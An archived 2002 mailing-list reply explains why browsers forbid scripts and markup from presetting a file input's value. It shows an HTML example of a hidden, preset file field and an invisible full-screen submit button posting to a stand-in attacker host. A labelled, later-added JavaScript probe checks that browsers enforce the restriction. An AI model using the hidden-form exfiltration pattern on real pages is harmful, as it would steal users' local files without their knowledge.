- From: Christian Wolfgang Hujer <Christian.Hujer@itcqis.com>
- Date: Thu, 14 Feb 2002 15:32:03 +0100
- To: Tanev Robert <RT@railconsult.de>, www-html@w3.org
Hello Tanev,

On Thursday, 14 February 2002 14:44, Tanev Robert wrote:
> Hello everybody,
>
> we are facing the following problem: we want to provide an input element of
> type file with a default value that should be displayed by default
> (actually it is the current value of a specific attribute). While the
> value property is read-only in IE5-6, we tried to set the
> defaultValue property through script:
>
> var oInput = document.createElement("INPUT");
> oInput.type = "file";
> oInput.defaultValue = _someValue_;
> oParent.appendChild(oInput);
>
> Unfortunately, the default value is not displayed. The documentation
> states that changing the defaultValue has no effect until a form is
> reset, but in our test case this did not happen.
>
> Does anybody know how to force a file input element to show an initial
> value, or does somebody have a workaround for this?

I hope there never will be a workaround for this, since this is a security issue, as Andrew already said. I won't repeat what Andrew said (I completely agree with him); I just want to add further information on *why* this is a security issue.

Imagine code like this:

```html
<!-- ... -->
<form method="post" action="http://www.somecracker.mars/filereceiver">
  <input type="file" style="
    /* make this one invisible */
    display:none; visibility:hidden;
    /* Ensure it really is invisible */
    color:transparent; background-color:transparent;
    /* Ensure if above failed, at least the border is invisible */
    border:none;
    /* Another way to make it invisible */
    width:0px; height:0px;
  " name="f" value="C:\AUTOEXEC.BAT" />
  <input type="submit" style="
    /* make button itself invisible */
    color:transparent; background-color:transparent;
    /* make button border invisible */
    border-style:none;
    /* make button fill whole screen */
    display:block; position:absolute;
    left:0px; right:0px; width:auto;
    top:0px; bottom:0px; height:auto;
    /* make button frontmost component */
    z-index:2;
  " value="" />
  <!-- value: make button have no text (in case browser ignores color:transparent) -->
</form>
<!-- ... -->
```

Not even a single line of ECMAScript code is required to let the default value of `<input type="file" />` be a security issue. So ECMAScript must not be allowed to override the security defaults of the browser in any way. This must not be allowed even on intranets, since it would allow a new kind of trojan, or it would allow your co-workers to spy on your desktop.

And if I knew a workaround for this, I'd rather report it to bugtraq @ securityfocus and the browser vendor, not to this list ;)

Greetings

--
Christian Wolfgang Hujer
Managing Partner
ITCQIS GmbH
Phone: +49 (089) 27 37 04 37
Fax: +49 (089) 27 37 04 39
E-Mail: mailto:Christian.Hujer@itcqis.com
WWW: http://www.itcqis.com/
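The restriction this message argues for is what browsers enforce today: a file input ignores a `value` attribute in markup, and script may assign only the empty string to `.value` (anything else throws an `InvalidStateError`). The following check is an added example, not part of this message or the list thread: `probeFileInput(document)` can be run in a browser console to confirm the behaviour, and `FakeFileDoc` is a constructed stand-in modelling those rules so the same probe also runs outside a browser.

```javascript
// Added example (not from the original message). Reports whether a document's
// <input type="file"> refuses a preset path from markup and from script.
function probeFileInput(doc) {
  const input = doc.createElement("input");
  input.type = "file";
  const report = {};

  // 1. A value="..." attribute in markup must be ignored for file inputs.
  input.setAttribute("value", "C:\\AUTOEXEC.BAT");
  report.markupPresetIgnored = input.value === "" && input.files.length === 0;

  // 2. Script must not be able to preset a path either.
  try {
    input.value = "C:\\AUTOEXEC.BAT";
    report.scriptPresetRejected = false;
  } catch (e) {
    report.scriptPresetRejected = e.name === "InvalidStateError";
  }

  // 3. The only permitted assignment is "", which clears the selection.
  input.value = "";
  report.clearAllowed = input.files.length === 0;

  report.enforced = report.markupPresetIgnored &&
    report.scriptPresetRejected && report.clearAllowed;
  return report;
}

// Constructed stand-in (an assumption, not a real DOM) modelling the HTML
// spec rules: the value attribute is ignored for type=file, .value reflects
// only a user selection as "C:\fakepath\<name>", and assigning anything but
// "" throws InvalidStateError.
class FakeFileInput {
  constructor() { this.type = "text"; this.files = []; this.attrs = {}; }
  setAttribute(name, v) { this.attrs[name] = v; }
  get value() {
    if (this.type !== "file") return this.attrs.value || "";
    return this.files.length ? "C:\\fakepath\\" + this.files[0].name : "";
  }
  set value(v) {
    if (this.type !== "file") { this.attrs.value = v; return; }
    if (v !== "") {
      const e = new Error("file input value may only be set to \"\"");
      e.name = "InvalidStateError";
      throw e;
    }
    this.files = [];
  }
}
const FakeFileDoc = { createElement: () => new FakeFileInput() };
```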
Received on Thursday, 14 February 2002 10:10:10 UTC